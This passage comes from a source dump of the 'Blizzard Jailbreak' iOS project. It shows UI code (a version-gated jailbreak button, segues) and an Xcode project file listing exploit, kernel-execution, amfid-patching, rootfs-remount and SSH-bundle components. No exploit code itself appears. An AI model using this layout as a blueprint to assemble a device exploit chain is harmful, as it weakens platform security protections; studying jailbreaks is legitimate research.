#import <UIKit/UIKit.h>
NS_ASSUME_NONNULL_BEGIN
// NOTE(review): this line defines (rather than declares) a global in a header, so
// every file that imports blizzardView.h carries its own definition. It sits
// inside NS_ASSUME_NONNULL_BEGIN and is therefore implicitly nonnull, although
// nothing in this header assigns it. No use of it is visible in blizzardView.m.
UIBarButtonItem* dismissKeyboardButton;
// View controller exposing two storyboard outlets.
@interface blizzardView : UIViewController
// Button outlet; blizzardView.m defines an IBAction with the same name.
@property (weak, nonatomic) IBOutlet UIButton *blizzardInit;
// Text field outlet; blizzardView.m sets this controller as its delegate.
// What the entered value is used for is not visible in this header.
@property (weak, nonatomic) IBOutlet UITextField *nonceField;
@end
NS_ASSUME_NONNULL_END
================================================
FILE: Blizzard Jailbreak/blizzardView.m
================================================
//
// blizzardView.m
// Blizzard Jailbreak
//
// Created by GeoSn0w on 8/10/20.
// Copyright © 2020 GeoSn0w. All rights reserved.
//
#import "blizzardView.h"
#include "blizzardJailbreak.h"
// True when the running system version is less than or equal to v under a numeric
// string comparison (the compare: result is anything but NSOrderedDescending).
// v must be a C string literal; the leading @ turns it into an NSString literal.
// This is an upper bound only: no minimum version is checked.
#define iosVersionSupport(v) ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)
@interface blizzardView () <UITextFieldDelegate>
@end
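@implementation blizzardView

// Makes this controller the nonce field's delegate and prints the banner to stdout.
- (void)viewDidLoad {
    [super viewDidLoad];
    self.nonceField.delegate = self;
    printf("Blizzard Jailbreak\nby GeoSn0w (@FCE365)\n\nAn Open-Source Jailbreak for you to study and dissect :-)\n");
}

// Button handler. On a system version up to and including 13.7 it disables the
// button, relabels it and performs the "vc" segue; on anything newer it reports
// the version as unsupported and exits.
// NOTE(review): the gate has no lower bound, so every version at or below 13.7
// passes it. Confirm which versions the rest of the project actually handles.
- (IBAction)blizzardInit:(id)sender {
    if (iosVersionSupport("13.7")){
        _blizzardInit.enabled = NO;
        [_blizzardInit setTitle:@"JAILBREAKING..." forState:UIControlStateDisabled];
        // Hop through a background queue and back to the main queue, so the segue
        // runs on the main thread after this handler has returned.
        dispatch_async(dispatch_get_global_queue(0, 0), ^{
            dispatch_async(dispatch_get_main_queue(), ^{
                [self performSegueWithIdentifier:@"vc" sender:self];
            });
        });
    } else {
        // Everything newer than 13.7 is refused. The original tested
        // iosVersionSupport("14.0") here, so a version above 14.0 matched
        // neither branch and the tap silently did nothing.
        printf("The iOS version is not supported");
        exit(0);
    }
}

// Opens the settings screen through the "settingsView" segue.
- (IBAction)injectSettingsUI:(id)sender {
    [self performSegueWithIdentifier:@"settingsView" sender:self];
}

// Dismisses the presented controller; nothing is persisted by this method itself.
- (IBAction)saveJailbreakSettings:(id)sender {
    [self dismissViewControllerAnimated:YES completion:nil];
}

// UITextFieldDelegate: Return hides the keyboard.
- (BOOL)textFieldShouldReturn:(UITextField *)textField {
    [textField resignFirstResponder];
    return YES;
}

@end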
================================================
FILE: Blizzard Jailbreak/main.m
================================================
//
// main.m
// sock_port
//
// Created by Jake James on 7/17/19.
// Copyright © 2019 Jake James. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "AppDelegate.h"
// Process entry point: hands control to UIKit with AppDelegate as the
// application delegate and the default UIApplication class (nil).
int main(int argc, char * argv[]) {
    @autoreleasepool {
        NSString *delegateClassName = NSStringFromClass([AppDelegate class]);
        return UIApplicationMain(argc, argv, nil, delegateClassName);
    }
}
================================================
FILE: Blizzard Jailbreak.xcodeproj/project.pbxproj
================================================
// !$*UTF8*$!
{
archiveVersion = 1;
classes = {
};
objectVersion = 48;
objects = {
/* Begin PBXBuildFile section */
8288501222E07303005D10FC /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 8288501022E07303005D10FC /* kernel_memory.c */; };
8288501522E07C15005D10FC /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 8288501322E07C14005D10FC /* offsets.m */; };
82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */ = {isa = PBXBuildFile; fileRef = 82E9B71422E24BAD0016AA39 /* iosurface.c */; };
82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179F022DF4ED700231F8C /* AppDelegate.m */; };
82F179F722DF4ED700231F8C /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F522DF4ED700231F8C /* Main.storyboard */; };
82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F822DF4ED700231F8C /* Assets.xcassets */; };
82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */; };
82F179FF22DF4ED700231F8C /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179FE22DF4ED700231F8C /* main.m */; };
82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A0822DF4ED800231F8C /* socket_freeTests.m */; };
82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A1322DF4ED800231F8C /* socket_freeUITests.m */; };
82F17A2322DF4EF100231F8C /* exploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2122DF4EF100231F8C /* exploit.c */; };
82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2422DF4F1C00231F8C /* exploit_utilities.c */; };
D613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B71A24E217D90069CA9B /* BlizzardLog.m */; };
D613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B72424E2A76A0069CA9B /* rootfs_remount.m */; };
D613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B72624E2A76A0069CA9B /* offsetfinder.cpp */; };
D613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B73424E2A8AB0069CA9B /* snapshot_tools.c */; };
D613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */; };
D613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73F24E2B1540069CA9B /* libimg4tool.a */; };
D613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73E24E2B1530069CA9B /* libmerged.a */; };
D613B74824E2B1E70069CA9B /* libplist.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73C24E2B1530069CA9B /* libplist.a */; };
D613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73D24E2B1530069CA9B /* libplist++.a */; };
D613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74A24E2B2560069CA9B /* libcompression.tbd */; };
D613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */; };
D613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */; };
D613B75724E2E8300069CA9B /* amfi_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75324E2E8300069CA9B /* amfi_utils.m */; };
D613B75824E2E8300069CA9B /* amfid_tools.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75424E2E8300069CA9B /* amfid_tools.m */; };
D613B75924E2E8300069CA9B /* amfid_mem.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75624E2E8300069CA9B /* amfid_mem.m */; };
D613B75C24E2E8590069CA9B /* amfid.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75B24E2E8580069CA9B /* amfid.m */; };
D613B76024E2EEFD0069CA9B /* osobject.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B75E24E2EEFD0069CA9B /* osobject.c */; };
D613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B76424E2F2D30069CA9B /* kernSymbolication.c */; };
D613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B78024E2F9980069CA9B /* lzssdec.cpp */; };
D62BC51E24E4113200EC63D4 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51D24E4113200EC63D4 /* tar */; };
D62BC52024E41AF500EC63D4 /* basebins.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51F24E41AF500EC63D4 /* basebins.tar */; };
D62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC52124E41F2500EC63D4 /* dropbear.tar */; };
D62CA1E524E1C7EA002E6756 /* patchfinder64.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E424E1C7EA002E6756 /* patchfinder64.m */; };
D62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E624E1C7F7002E6756 /* kexecute.c */; };
D62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */; };
D62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EC24E1C83E002E6756 /* offsetof.c */; };
D63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = D63EDABF24E1989F009B305D /* blizzardJailbreak.m */; };
D69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D69C4C9825686627001DE2BC /* IOKit.tbd */; };
D69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */; };
D69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */; };
D69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA625686894001DE2BC /* ios13_userspace.c */; };
D69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA725686894001DE2BC /* ios13_change_offsets.m */; };
D69C4CB225686895001DE2BC /* libsnappy.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAA25686895001DE2BC /* libsnappy.c */; };
D69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAB25686895001DE2BC /* ios_7st_utils.m */; };
D6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */ = {isa = PBXBuildFile; fileRef = D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */; };
/* End PBXBuildFile section */
/* Begin PBXContainerItemProxy section */
82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */ = {
isa = PBXContainerItemProxy;
containerPortal = 82F179E422DF4ED700231F8C /* Project object */;
proxyType = 1;
remoteGlobalIDString = 82F179EB22DF4ED700231F8C;
remoteInfo = socket_free;
};
82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */ = {
isa = PBXContainerItemProxy;
containerPortal = 82F179E422DF4ED700231F8C /* Project object */;
proxyType = 1;
remoteGlobalIDString = 82F179EB22DF4ED700231F8C;
remoteInfo = socket_free;
};
/* End PBXContainerItemProxy section */
/* Begin PBXFileReference section */
8288501022E07303005D10FC /* kernel_memory.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernel_memory.c; sourceTree = "<group>"; };
8288501122E07303005D10FC /* kernel_memory.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernel_memory.h; sourceTree = "<group>"; };
8288501322E07C14005D10FC /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = "<group>"; };
8288501422E07C14005D10FC /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = "<group>"; };
82E9B71322E24BAC0016AA39 /* iosurface.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = iosurface.h; sourceTree = "<group>"; };
82E9B71422E24BAD0016AA39 /* iosurface.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = iosurface.c; sourceTree = "<group>"; };
82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = "Blizzard Jailbreak.app"; sourceTree = BUILT_PRODUCTS_DIR; };
82F179EF22DF4ED700231F8C /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = "<group>"; };
82F179F022DF4ED700231F8C /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = "<group>"; };
82F179F622DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = "<group>"; };
82F179F822DF4ED700231F8C /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = "<group>"; };
82F179FB22DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = "<group>"; };
82F179FD22DF4ED700231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
82F179FE22DF4ED700231F8C /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = "<group>"; };
82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = "Blizzard JailbreakTests.xctest"; sourceTree = BUILT_PRODUCTS_DIR; };
82F17A0822DF4ED800231F8C /* socket_freeTests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeTests.m; sourceTree = "<group>"; };
82F17A0A22DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = "Blizzard JailbreakUITests.xctest"; sourceTree = BUILT_PRODUCTS_DIR; };
82F17A1322DF4ED800231F8C /* socket_freeUITests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeUITests.m; sourceTree = "<group>"; };
82F17A1522DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
82F17A2122DF4EF100231F8C /* exploit.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit.c; sourceTree = "<group>"; };
82F17A2222DF4EF100231F8C /* exploit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit.h; sourceTree = "<group>"; };
82F17A2422DF4F1C00231F8C /* exploit_utilities.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit_utilities.c; sourceTree = "<group>"; };
82F17A2522DF4F1C00231F8C /* exploit_utilities.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit_utilities.h; sourceTree = "<group>"; };
82F17A2822DF57B700231F8C /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = IOKit.tbd; path = socket_free/IOKit.tbd; sourceTree = "<group>"; };
D613B71924E217D90069CA9B /* BlizzardLog.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardLog.h; sourceTree = "<group>"; };
D613B71A24E217D90069CA9B /* BlizzardLog.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BlizzardLog.m; sourceTree = "<group>"; };
D613B72424E2A76A0069CA9B /* rootfs_remount.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = rootfs_remount.m; sourceTree = "<group>"; };
D613B72524E2A76A0069CA9B /* rootfs_remount.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = rootfs_remount.h; sourceTree = "<group>"; };
D613B72624E2A76A0069CA9B /* offsetfinder.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = offsetfinder.cpp; sourceTree = "<group>"; };
D613B72924E2A79F0069CA9B /* liboffsetfinder64.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = liboffsetfinder64.hpp; sourceTree = "<group>"; };
D613B72A24E2A7B70069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = liboffsetfinder64.a; path = "../electra1131-master/electra1131/libs/liboffsetfinder64.a"; sourceTree = "<group>"; };
D613B72B24E2A7B70069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libplist.a; path = "../electra1131-master/electra1131/libs/libplist.a"; sourceTree = "<group>"; };
D613B72C24E2A7B70069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = "libplist++.a"; path = "../electra1131-master/electra1131/libs/libplist++.a"; sourceTree = "<group>"; };
D613B72D24E2A7B70069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libmerged.a; path = "../electra1131-master/electra1131/libs/libmerged.a"; sourceTree = "<group>"; };
D613B72E24E2A7B70069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libimg4tool.a; path = "../electra1131-master/electra1131/libs/libimg4tool.a"; sourceTree = "<group>"; };
D613B73424E2A8AB0069CA9B /* snapshot_tools.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = snapshot_tools.c; sourceTree = "<group>"; };
D613B73624E2A8B00069CA9B /* snapshot_tools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = snapshot_tools.h; sourceTree = "<group>"; };
D613B73724E2A8C40069CA9B /* IOKit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOKit.h; sourceTree = "<group>"; };
D613B73824E2A99B0069CA9B /* system_reboot.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = system_reboot.h; sourceTree = "<group>"; };
D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = liboffsetfinder64.a; sourceTree = "<group>"; };
D613B73C24E2B1530069CA9B /* libplist.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libplist.a; sourceTree = "<group>"; };
D613B73D24E2B1530069CA9B /* libplist++.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = "libplist++.a"; sourceTree = "<group>"; };
D613B73E24E2B1530069CA9B /* libmerged.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libmerged.a; sourceTree = "<group>"; };
D613B73F24E2B1540069CA9B /* libimg4tool.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; path = libimg4tool.a; sourceTree = "<group>"; };
D613B74A24E2B2560069CA9B /* libcompression.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libcompression.tbd; path = usr/lib/libcompression.tbd; sourceTree = SDKROOT; };
D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libMobileGestalt.tbd; path = usr/lib/libMobileGestalt.tbd; sourceTree = SDKROOT; };
D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = BlizzardSpawnerTools.c; sourceTree = "<group>"; };
D613B74F24E2CD5E0069CA9B /* BlizzardSpawnerTools.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardSpawnerTools.h; sourceTree = "<group>"; };
D613B75124E2E82F0069CA9B /* amfid_tools.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_tools.h; sourceTree = "<group>"; };
D613B75224E2E8300069CA9B /* amfi_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfi_utils.h; sourceTree = "<group>"; };
D613B75324E2E8300069CA9B /* amfi_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfi_utils.m; sourceTree = "<group>"; };
D613B75424E2E8300069CA9B /* amfid_tools.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_tools.m; sourceTree = "<group>"; };
D613B75524E2E8300069CA9B /* amfid_mem.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid_mem.h; sourceTree = "<group>"; };
D613B75624E2E8300069CA9B /* amfid_mem.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid_mem.m; sourceTree = "<group>"; };
D613B75A24E2E8580069CA9B /* amfid.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = amfid.h; sourceTree = "<group>"; };
D613B75B24E2E8580069CA9B /* amfid.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = amfid.m; sourceTree = "<group>"; };
D613B75D24E2E8690069CA9B /* cs_blob.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = cs_blob.h; sourceTree = "<group>"; };
D613B75E24E2EEFD0069CA9B /* osobject.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = osobject.c; sourceTree = "<group>"; };
D613B75F24E2EEFD0069CA9B /* osobject.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = osobject.h; sourceTree = "<group>"; };
D613B76424E2F2D30069CA9B /* kernSymbolication.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernSymbolication.c; sourceTree = "<group>"; };
D613B76524E2F2D30069CA9B /* kernSymbolication.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernSymbolication.h; sourceTree = "<group>"; };
D613B78024E2F9980069CA9B /* lzssdec.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; path = lzssdec.cpp; sourceTree = "<group>"; };
D613B78124E2F9980069CA9B /* lzssdec.hpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.h; path = lzssdec.hpp; sourceTree = "<group>"; };
D62BC51D24E4113200EC63D4 /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = "<group>"; };
D62BC51F24E41AF500EC63D4 /* basebins.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = basebins.tar; sourceTree = "<group>"; };
D62BC52124E41F2500EC63D4 /* dropbear.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = dropbear.tar; sourceTree = "<group>"; };
D62CA1E324E1C7EA002E6756 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = "<group>"; };
D62CA1E424E1C7EA002E6756 /* patchfinder64.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = patchfinder64.m; sourceTree = "<group>"; };
D62CA1E624E1C7F7002E6756 /* kexecute.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kexecute.c; sourceTree = "<group>"; };
D62CA1E724E1C7F7002E6756 /* kexecute.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kexecute.h; sourceTree = "<group>"; };
D62CA1E924E1C7FF002E6756 /* kernel_utils.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel_utils.h; sourceTree = "<group>"; };
D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = kernel_utils.m; sourceTree = "<group>"; };
D62CA1EC24E1C83E002E6756 /* offsetof.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsetof.c; sourceTree = "<group>"; };
D62CA1ED24E1C83E002E6756 /* offsetof.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsetof.h; sourceTree = "<group>"; };
D62CA20A24E1D95F002E6756 /* kerneldec */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; name = kerneldec; path = "../jelbrekLib-master/kerneldec/kerneldec"; sourceTree = "<group>"; };
D63EDABF24E1989F009B305D /* blizzardJailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = blizzardJailbreak.m; sourceTree = "<group>"; };
D63EDAC024E1989F009B305D /* blizzardJailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = blizzardJailbreak.h; sourceTree = "<group>"; };
D69C4C96256865BF001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = IOKit.tbd; path = ../ToolChain/IOKit.tbd; sourceTree = "<group>"; };
D69C4C9825686627001DE2BC /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = IOKit.tbd; path = "../ToolChain/Jailbreak Frameworks/IOKit.tbd"; sourceTree = "<group>"; };
D69C4C9D256866A2001DE2BC /* OSMessageNotification.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = OSMessageNotification.h; path = include/IOKit/OSMessageNotification.h; sourceTree = "<group>"; };
D69C4CA225686884001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = xpc.h; sourceTree = "<group>"; };
D69C4CA325686884001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = vnode.h; sourceTree = "<group>"; };
D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace_pac.c; sourceTree = "<group>"; };
D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_kernel_universal.c; sourceTree = "<group>"; };
D69C4CA625686894001DE2BC /* ios13_userspace.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = ios13_userspace.c; sourceTree = "<group>"; };
D69C4CA725686894001DE2BC /* ios13_change_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios13_change_offsets.m; sourceTree = "<group>"; };
D69C4CA825686894001DE2BC /* xpc.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = xpc.h; path = "../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/xpc.h"; sourceTree = "<group>"; };
D69C4CA925686894001DE2BC /* IOTypes.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOTypes.h; sourceTree = "<group>"; };
D69C4CAA25686895001DE2BC /* libsnappy.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = libsnappy.c; sourceTree = "<group>"; };
D69C4CAB25686895001DE2BC /* ios_7st_utils.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = ios_7st_utils.m; sourceTree = "<group>"; };
D69C4CAC25686895001DE2BC /* libsnappy.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = libsnappy.h; sourceTree = "<group>"; };
D69C4CAD25686895001DE2BC /* vnode.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = vnode.h; path = "../../../FreeTheSandbox_LPE_POC_13.7-main/ios13_app1/vnode.h"; sourceTree = "<group>"; };
D69C4CB5256868BB001DE2BC /* IOReturn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOReturn.h; sourceTree = "<group>"; };
D69C4CB6256868BB001DE2BC /* IOKitKeys.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOKitKeys.h; sourceTree = "<group>"; };
